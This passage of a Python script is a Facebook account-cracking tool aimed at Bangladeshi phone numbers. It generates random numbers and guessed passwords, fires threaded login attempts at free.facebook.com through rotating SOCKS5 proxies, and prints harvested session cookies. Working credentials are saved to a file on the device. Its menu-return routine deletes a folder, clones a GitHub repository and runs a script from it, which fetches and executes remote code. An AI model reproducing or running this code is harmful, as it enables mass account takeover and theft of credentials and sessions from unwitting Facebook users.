        #print(f" \033[1;92mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        #print(f" \033[1;92mNUMBER YOU PUT        : \033[1;92m"+code)
        #print(f" \033[1;92mPROCESS HAS BEEN STARTED")
       # print(f" \033[1;92mBE PATIENT.......")
       # print(f" \033[1;92mTO STOP PROCESS Ctrl + Z ")
        #print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        for love in user:
            uid = code+love
            pwx = [code+love[2:]]
            manshera.submit(m,uid,pwx,tl)
    sh = input(f'\n\n    {M}Go TO MAIN MENU [ Y/N] :{H}  ')
    if sh =='y':
        check_update()
    elif sh =='Y':
        check_update()
    else:
        check_update()
    
    
    
def sh14():
    user=[]
    
    os.getuid
    os.geteuid
    clear()
    banner()
    print(f"                 {H} 14 DIGIT {K}CRACK{P} [{H}⚜{P}] ");time.sleep(0.05)
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print(f'   \033[1;92m BD CODE: {P}[{H}+88016{P}][{B}+88017{P}][{K}+88019{P}][{K}+88018{P}][{P}+88013{P}][{K}+88014{P}]')
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print("")
#    print(f"          \x1b[97m[\033[37;41m  C O D E    M E N U   \033[0;m]")
  #  print(f"")
#    linex()
 #   print(f"        \x1b[97m[\033[95;42mEXAMPLE :👇\033[0;m]")
  #  print(f"")
   # print(' 880171 , 880172 , 880173 \n 880174 , 880191 , 880192\n 880193 , 880194 , 880181\n 880182 , 880183 , 880184\n 880161 , 880162 , 880163 ')
 #   print(f"")
  #  linex()
    code = input(f' CHOOSE :{H} ')
    os.system("clear")
    banner()
    print(f"")
    print(f'    {P}[{H}√{P}] EXAMPLE    : {K}5000/10000/20000')
    print(f"")
    limit = int(input(f'    %s[%s?%s] CRACK ID LIMIT : %s'%(N,K,N,H)))
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(8))
        user.append(nmp)
    with ThreadPool(max_workers=80) as manshera:    
        clear()
        banner()
        tl = str(len(user))
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        print(f"{P}[{H}•{P}]  \033[1;92mWElCOME  MY TOOLS     : \033[1;92m"+name)
        print(f"{P}[{H}•{P}]  \033[1;92mTOTAL IDZ             : \033[1;92m"+tl)
        print(f"{P}[{H}•{P}]  \033[1;92mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        print(f"{P}[{H}•{P}]  \033[1;92mNUMBER YOU PUT        : {RED}"+code)
        print(f"{P}[{H}•{P}]  \033[1;92mPROCESS HAS BEEN STARTED")
        print(f"{P}[{H}•{P}]  \033[1;92mBE PATIENT.......")
        print(f"{P}[{H}•{P}]  \033[1;92mTO STOP PROCESS Ctrl + Z ")
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        #print(f" \033[1;92mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        #print(f" \033[1;92mNUMBER YOU PUT        : \033[1;92m"+code)
        #print(f" \033[1;92mPROCESS HAS BEEN STARTED")
       # print(f" \033[1;92mBE PATIENT.......")
       # print(f" \033[1;92mTO STOP PROCESS Ctrl + Z ")
        #print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        for love in user:
            uid = code+love
            pwx = [code+love]
            manshera.submit(m,uid,pwx,tl)
    sh = input(f'\n\n    {M}Go TO MAIN MENU [ Y/N] :{H}  ')
    if sh =='y':
        check_update()
    elif sh =='Y':
        check_update()
    else:
        check_update()
    
    
def sh10():
    user=[]
    
    os.getuid
    os.geteuid
    clear()
    banner()
    print(f"                 {H} 10 DIGIT {K}CRACK{P} [{H}⚜{P}] ");time.sleep(0.05)
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print(f'   \033[1;92m BD CODE: {P}[{H}016{P}][{B}017{P}][{K}019{P}][{K}018{P}][{P}013{P}][{K}014{P}]')
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print("")
#    print(f"          \x1b[97m[\033[37;41m  C O D E    M E N U   \033[0;m]")
  #  print(f"")
#    linex()
 #   print(f"        \x1b[97m[\033[95;42mEXAMPLE :👇\033[0;m]")
  #  print(f"")
   # print(' 880171 , 880172 , 880173 \n 880174 , 880191 , 880192\n 880193 , 880194 , 880181\n 880182 , 880183 , 880184\n 880161 , 880162 , 880163 ')
 #   print(f"")
  #  linex()
    code = input(f' CHOOSE :{H} ')
    os.system("clear")
    banner()
    print(f"")
    print(f'    {P}[{H}√{P}] EXAMPLE    : {K}5000/10000/20000')
    print(f"")
    limit = int(input(f'    %s[%s?%s] CRACK ID LIMIT : %s'%(N,K,N,H)))
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(8))
        user.append(nmp)
    with ThreadPool(max_workers=80) as manshera:    
        clear()
        banner()
        tl = str(len(user))
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        print(f"{P}[{H}•{P}]  \033[1;92mWElCOME  MY TOOLS     : \033[1;92m"+name)
        print(f"{P}[{H}•{P}]  \033[1;92mTOTAL IDZ             : \033[1;92m"+tl)
        print(f"{P}[{H}•{P}]  \033[1;92mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        print(f"{P}[{H}•{P}]  \033[1;92mNUMBER YOU PUT        : {RED}"+code)
        print(f"{P}[{H}•{P}]  \033[1;92mPROCESS HAS BEEN STARTED")
        print(f"{P}[{H}•{P}]  \033[1;92mBE PATIENT.......")
        print(f"{P}[{H}•{P}]  \033[1;92mTO STOP PROCESS Ctrl + Z ")
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        #print(f" \033[1;92mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        #print(f" \033[1;92mNUMBER YOU PUT        : \033[1;92m"+code)
        #print(f" \033[1;92mPROCESS HAS BEEN STARTED")
       # print(f" \033[1;92mBE PATIENT.......")
       # print(f" \033[1;92mTO STOP PROCESS Ctrl + Z ")
        #print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        for love in user:
            uid = code+love
            pwx = [code+love[1:]]
            manshera.submit(m,uid,pwx,tl)
    sh = input(f'\n\n    {M}Go TO MAIN MENU [ Y/N] :{H}  ')
    if sh =='y':
        check_update()
    elif sh =='Y':
        check_update()
    else:
        check_update()
    
    
def sh12():
    user=[]
    
    os.getuid
    os.geteuid
    clear()
    banner()
    print(f"                 {H} 12 DIGIT {K}CRACK{P} [{H}⚜{P}] ");time.sleep(0.05)
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print(f'   \033[1;92m BD CODE: {P}[{H}+88016{P}][{B}+88017{P}][{K}+88019{P}][{K}+88018{P}][{P}+88013{P}][{K}+88014{P}]')
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print("")
#    print(f"          \x1b[97m[\033[37;41m  C O D E    M E N U   \033[0;m]")
  #  print(f"")
#    linex()
 #   print(f"        \x1b[97m[\033[95;42mEXAMPLE :👇\033[0;m]")
  #  print(f"")
   # print(' 880171 , 880172 , 880173 \n 880174 , 880191 , 880192\n 880193 , 880194 , 880181\n 880182 , 880183 , 880184\n 880161 , 880162 , 880163 ')
 #   print(f"")
  #  linex()
    code = input(f' CHOOSE :{H} ')
    os.system("clear")
    banner()
    print(f"")
    print(f'    {P}[{H}√{P}] EXAMPLE    : {K}5000/10000/20000')
    print(f"")
    limit = int(input(f'    %s[%s?%s] CRACK ID LIMIT : %s'%(N,K,N,H)))
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(8))
        user.append(nmp)
    with ThreadPool(max_workers=80) as manshera:    
        clear()
        banner()
        tl = str(len(user))
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        print(f"{P}[{H}•{P}]  \033[1;92mWElCOME  MY TOOLS     : \033[1;92m"+name)
        print(f"{P}[{H}•{P}]  \033[1;92mTOTAL IDZ             : \033[1;92m"+tl)
        print(f"{P}[{H}•{P}]  \033[1;92mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        print(f"{P}[{H}•{P}]  \033[1;92mNUMBER YOU PUT        : {RED}"+code)
        print(f"{P}[{H}•{P}]  \033[1;92mPROCESS HAS BEEN STARTED")
        print(f"{P}[{H}•{P}]  \033[1;92mBE PATIENT.......")
        print(f"{P}[{H}•{P}]  \033[1;92mTO STOP PROCESS Ctrl + Z ")
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        #print(f" \033[1;92mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        #print(f" \033[1;92mNUMBER YOU PUT        : \033[1;92m"+code)
        #print(f" \033[1;92mPROCESS HAS BEEN STARTED")
       # print(f" \033[1;92mBE PATIENT.......")
       # print(f" \033[1;92mTO STOP PROCESS Ctrl + Z ")
        #print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        for love in user:
            uid = code+love
            pwx = [code+love[2:]]
            manshera.submit(m,uid,pwx,tl)
    sh = input(f'\n\n    {M}Go TO MAIN MENU [ Y/N] :{H}  ')
    if sh =='y':
        check_update()
    elif sh =='Y':
        check_update()
    else:
        check_update()
    

    

def sh6():
    user=[]
    
    os.getuid
    os.geteuid
    clear()
    banner()
    print(f"                 {H} 6 DIGIT {K}CRACK{P} [{H}⚜{P}] ");time.sleep(0.05)
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print(f'   \033[1;92m BD CODE: {P}[{H}016{P}][{B}017{P}][{K}019{P}][{K}018{P}][{P}013{P}][{K}014{P}]')
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print("")
#    print(f"          \x1b[97m[\033[37;41m  C O D E    M E N U   \033[0;m]")
  #  print(f"")
#    linex()
 #   print(f"        \x1b[97m[\033[95;42mEXAMPLE :👇\033[0;m]")
  #  print(f"")
   # print(' 880171 , 880172 , 880173 \n 880174 , 880191 , 880192\n 880193 , 880194 , 880181\n 880182 , 880183 , 880184\n 880161 , 880162 , 880163 ')
 #   print(f"")
  #  linex()
    code = input(f' CHOOSE :{H} ')
    os.system("clear")
    banner()
    print(f"")
    print(f'    {P}[{H}√{P}] EXAMPLE    : {K}5000/10000/20000')
    print(f"")
    limit = int(input(f'    %s[%s?%s] CRACK ID LIMIT : %s'%(N,K,N,H)))
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(6))
        user.append(nmp)
    with ThreadPool(max_workers=80) as manshera:    
        clear()
        banner()
        tl = str(len(user))
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        print(f"{P}[{H}•{P}]  \033[1;92mWElCOME  MY TOOLS     : \033[1;92m"+name)
        print(f"{P}[{H}•{P}]  \033[1;92mTOTAL IDZ             : \033[1;92m"+tl)
        print(f"{P}[{H}•{P}]  \033[1;92mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        print(f"{P}[{H}•{P}]  \033[1;92mNUMBER YOU PUT        : {RED}"+code)
        print(f"{P}[{H}•{P}]  \033[1;92mPROCESS HAS BEEN STARTED")
        print(f"{P}[{H}•{P}]  \033[1;92mBE PATIENT.......")
        print(f"{P}[{H}•{P}]  \033[1;92mTO STOP PROCESS Ctrl + Z ")
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        #print(f" \033[1;92mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        #print(f" \033[1;92mNUMBER YOU PUT        : \033[1;92m"+code)
        #print(f" \033[1;92mPROCESS HAS BEEN STARTED")
       # print(f" \033[1;92mBE PATIENT.......")
       # print(f" \033[1;92mTO STOP PROCESS Ctrl + Z ")
        #print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        for love in user:
            uid = code+love
            pwx = [code+love[5:]]
            manshera.submit(m,uid,pwx,tl)
    sh = input(f'\n\n    {M}Go TO MAIN MENU [ Y/N] :{H}  ')
    if sh =='y':
        check_update()
    elif sh =='Y':
        check_update()
    else:
        check_update()
    
def sh13():
    user=[]
    
    os.getuid
    os.geteuid
    clear()
    banner()
    print(f"                 {H} 11 DIGIT {K}CRACK{P} [{H}⚜{P}] ");time.sleep(0.05)
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print(f'   \033[1;92m BD CODE: {P}[{H}+88016{P}][{B}+88017{P}][{K}+88019{P}][{K}+88018{P}][{P}+88013{P}][{K}+88014{P}]')
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print("")
#    print(f"          \x1b[97m[\033[37;41m  C O D E    M E N U   \033[0;m]")
  #  print(f"")
#    linex()
 #   print(f"        \x1b[97m[\033[95;42mEXAMPLE :👇\033[0;m]")
  #  print(f"")
   # print(' 880171 , 880172 , 880173 \n 880174 , 880191 , 880192\n 880193 , 880194 , 880181\n 880182 , 880183 , 880184\n 880161 , 880162 , 880163 ')
 #   print(f"")
  #  linex()
    code = input(f' CHOOSE :{H} ')
    os.system("clear")
    banner()
    print(f"")
    print(f'    {P}[{H}√{P}] EXAMPLE    : {K}5000/10000/20000')
    print(f"")
    limit = int(input(f'    %s[%s?%s] CRACK ID LIMIT : %s'%(N,K,N,H)))
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(8))
        user.append(nmp)
    with ThreadPool(max_workers=80) as manshera:    
        clear()
        banner()
        tl = str(len(user))
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        print(f"{P}[{H}•{P}]  \033[1;94mWElCOME  MY TOOLS     : \033[1;92m"+name)
        print(f"{P}[{H}•{P}]  \033[1;94mTOTAL IDZ             : \033[1;92m"+tl)
        print(f"{P}[{H}•{P}]  \033[1;94mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        print(f"{P}[{H}•{P}]  \033[1;94mNUMBER YOU PUT        : {RED}"+code)
        print(f"{P}[{H}•{P}]  \033[1;94mPROCESS HAS BEEN STARTED")
        print(f"{P}[{H}•{P}]  \033[1;94mBE PATIENT.......")
        print(f"{P}[{H}•{P}]  \033[1;94mTO STOP PROCESS Ctrl + Z ")
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        #print(f" \033[1;92mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        #print(f" \033[1;92mNUMBER YOU PUT        : \033[1;92m"+code)
        #print(f" \033[1;92mPROCESS HAS BEEN STARTED")
       # print(f" \033[1;92mBE PATIENT.......")
       # print(f" \033[1;92mTO STOP PROCESS Ctrl + Z ")
        #print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        for love in user:
            uid = code+love
            pwx = [code+love[1:]]
            manshera.submit(m,uid,pwx,tl)
    sh = input(f'\n\n    {M}Go TO MAIN MENU [ Y/N] :{H}  ')
    if sh =='y':
        check_update()
    elif sh =='Y':
        check_update()
    else:
        check_update()
    
    
    
    
def sh7():
    user=[]
    
    os.getuid
    os.geteuid
    clear()
    banner()
    print(f"                 {H} 7 DIGIT {K}CRACK{P} [{H}⚜{P}] ");time.sleep(0.05)
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
  #  print(f"    {B}INDIA [992] [756] [982] [742] [852]")
    #print(f"    {K}PAK [0349] [0306] [0302] [0300] [0315") 
    print(f'   \033[1;94m BD  CODE: {P}[{H}0161{P}][{B}0171{P}][{K}0192{P}][{K}0182{P}]')
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    code = input(f'{M}    INPUT CODE {P}:{H} ')
    os.system("clear")
    banner()
    print(f"")
    print(f'    {P}[{H}√{P}] EXAMPLE    : {K}5000/10000/20000')
    print(f"")
    limit = int(input(f'    %s[%s?%s] CRACK ID LIMIT : %s'%(N,K,N,H)))
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(7))
        user.append(nmp)
    with ThreadPool(max_workers=50) as manshera:    
        clear()
        banner()
        tl = str(len(user))
        
         #print(f'  {H}    {P}FREE MOD          : {H}ON        {H}  ')
        #print(f'    {H}  {B}SIM CODE {K}ID       : {H}%s           {H}  '%(code))
        #print(f'  {H}    {M}TOTAL CRACK HASAN ID :{H} %s          {H}     '%(tl))
        #print(f'  {H}    {K}THE PROCESS HAS BEEN STARTED         {H}  ')
        #print(f'  {H}    {U}USE FLIGHT (\033[1;94mAIRPLANE\033[1;97m) MODE BEFORE USE {H} ')
       # print(f'  {M}  ╚════════════════════════════════════════╝ {P}')
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        print(f"{P}[{H}•{P}]  \033[1;96mWElCOME  MY TOOLS     : \033[1;92m"+name)
        print(f"{P}[{H}•{P}]  \033[1;96mTOTAL IDZ             : {RED}"+tl)
        print(f"{P}[{H}•{P}]  \033[1;96mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        print(f"{P}[{H}•{P}]  \033[1;96mNUMBER YOU PUT        : {RED}"+code)
        print(f"{P}[{H}•{P}]  \033[1;96mPROCESS HAS BEEN STARTED")
        print(f"{P}[{H}•{P}]  \033[1;96mBE PATIENT.......")
        print(f"{P}[{H}•{P}]  \033[1;96mTO STOP PROCESS Ctrl + Z ")
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        for love in user:
            uid = code+love
            pwx = [love]         
            manshera.submit(m,uid,pwx,tl)
    sh = input(f'\n\n    {M}Go TO MAIN MENU [ Y/N] :{H}  ')
    if sh =='y':
        check_update()
    elif sh =='Y':
        check_update()
    else:
        check_update()
def check_update():
    os.system("rm -rf BLACK_XXX")
    os.system("git clone https://github.com/Dark-Cyber-07/BLACK_XXX.git")
    os.system("cd BLACK_XXX && python S-CLONE.py")
    
    
def sh8():
    user=[]
    os.getuid
    os.geteuid
    clear()
    banner()
    print(f"                 {H} 8 DIGIT {K}CRACK{P} [{H}⚜{P}] ");time.sleep(0.05)
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print(f'   \033[1;94m BD  CODE: {P}[{H}016{P}][{B}017{P}][{K}019{P}][{K}018{P}][{B}013{P}]')
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    code = input(f'{M}    INPUT CODE {P}:{H} ')
    os.system("clear")
    banner()
    print(f"")
    print(f'    {P}[{H}√{P}] EXAMPLE    : {K}5000/10000/20000')
    print(f"")
    limit = int(input(f'    %s[%s?%s] CRACK ID LIMIT : %s'%(N,K,N,H)))
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(8))
        user.append(nmp)
    with ThreadPool(max_workers=30) as manshera:    
        clear()
        banner()
        tl = str(len(user))
        print(f'{M} \033[1;92m✓\033[1;93m===> [•] {RED}WElCOME  MY TOOLS     : {RED}'+name)
        print(f'{M} \033[1;92m✓\033[1;93m===> [•] {RED}TOTAL IDZ             : {RED}'+tl)
        print(f'{M} \033[1;92m✓\033[1;93m===> [•] {RED}NUMBER YOU PUT        : {RED}'+code)
        print(f'{M} \033[1;92m✓\033[1;93m===> [•] {RED}PROCESS HAS BEEN STARTED')
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        #print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        #print(f"{P}[{H}•{P}]  \033[1;93mWElCOME  MY TOOLS     : \033[1;92m"+name)
        #print(f"{P}[{H}•{P}]  \033[1;93mTOTAL I            : {RED}"+tl)
       #print(f"{P}[{H}•{P}]   \033[1;93mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        #print(f"{P}[{H}•{P}]  \033[1;93mNUMBER YOU PUT        : \033[1;92m"+code)
        #print(f"{P}[{H}•{P}]  \033[1;93mPROCESS HAS BEEN STARTED")
        #print(f"{P}[{H}•{P}]  \033[1;93mBE PATIENT.......")
        #print(f"{P}[{H}•{P}]  \033[1;93mTO STOP PROCESS Ctrl + Z ")
        #print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        for love in user:
            uid = code+love
            pwx = [love, 'bangladesh', 'freefire']
            manshera.submit(m,uid,pwx,tl)
    sh = input(f'\n\n    {M}Go TO MAIN MENU [ Y/N] :{H}  ')
    if sh =='y':
        check_update()
    elif sh =='Y':
        check_update()
    else:
        check_update()
    #MAIN OK METHOD
    
def m(uid,pwx,tl):
    global loop
    global ok
    global agents
    try:
        for ps in pwx:
            nip=random.choice(prox)
            proxs= {'http': 'socks5://'+nip}
            bi = random.choice([A])
            session = requests.Session()
            ff = random.choice(ugen)
            free_fb = session.get('https://free.facebook.com').text
            log_data = {
                "lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
            "jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
            "m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
            "li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
            "try_number":"0",
            "unrecognized_tries":"0",
            "email":uid,
            "pass":ps,
            "login":"Log In"}
            header = {"authority": 'free.facebook.com',
            "method": 'GET',
            "scheme": 'https',
            "accept": 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            "accept-encoding": 'gzip, deflate, br',
            "accept-language": 'en-US,en;q=0.9',
            "cache-control": 'no-cache',
            "pragma": 'no-cache',
            "referer": 'https://free.facebook.com/',
            "sec-ch-ua": '".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"',
            "sec-ch-ua-mobile": '?0',
            "sec-ch-ua-platform":'"Windows"',
            "sec-fetch-dest": 'manifest',
            "sec-fetch-mode": 'cors',
            "sec-fetch-site": 'same-origin',
            "user-agent":ff}
            lo = session.post('https://free.facebook.com/login/device-based/regular/login/?refsrc=deprecated&amp;lwv=100&amp;refid=8',data=log_data,headers=header).text
            log_cookies=session.cookies.get_dict().keys()
            if 'c_user' in log_cookies:
                coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
                uid = coki[151:166]
                #os.system("play-audio HASAN_OK.mp3")
                print('    \033[1;92m[HASAN-OK] '+uid+' | '+ps+'\033[0;97m')
                print(f'    {B}[NUMBER💗] {K}'+uid+'  ')
                print(f'    {B}[COOKI💉] {H}'+coki)
                cek_apk(session,coki)
                open('/sdcard/HASAN-OK.txt', 'a').write(uid+' | '+ps+'\n')
                ok.append(uid)
                break
            else:
                continue
        loop+=1
        animasi = random.choice(["\x1b[1;91mHASAN","\x1b[1;92mHASAN","\x1b[1;93mHASAN","\x1b[1;94mHASAN","\x1b[1;95mHASAN","\x1b[1;96mHASAN","\x1b[1;97mHASAN","\x1b[1;91mHASAN","\x1b[1;92mHASAN","\x1b[1;93mHASAN","\x1b[1;94mHASAN","\x1b[1;95mHASAN","\x1b[1;96mHASAN"])
        sys.stdout.write(f'\r    {P}[{animasi}{P}][{K}%s{P}/{B}%s{P}][{H}OK{P}]{P}[{H}%s{P}] \r'%(loop,tl,len(ok))),
        sys.stdout.flush()
    except:
        pass

#main()

#---------------------[END MENU]---------------------#
if __name__ == '__main__':
    main()
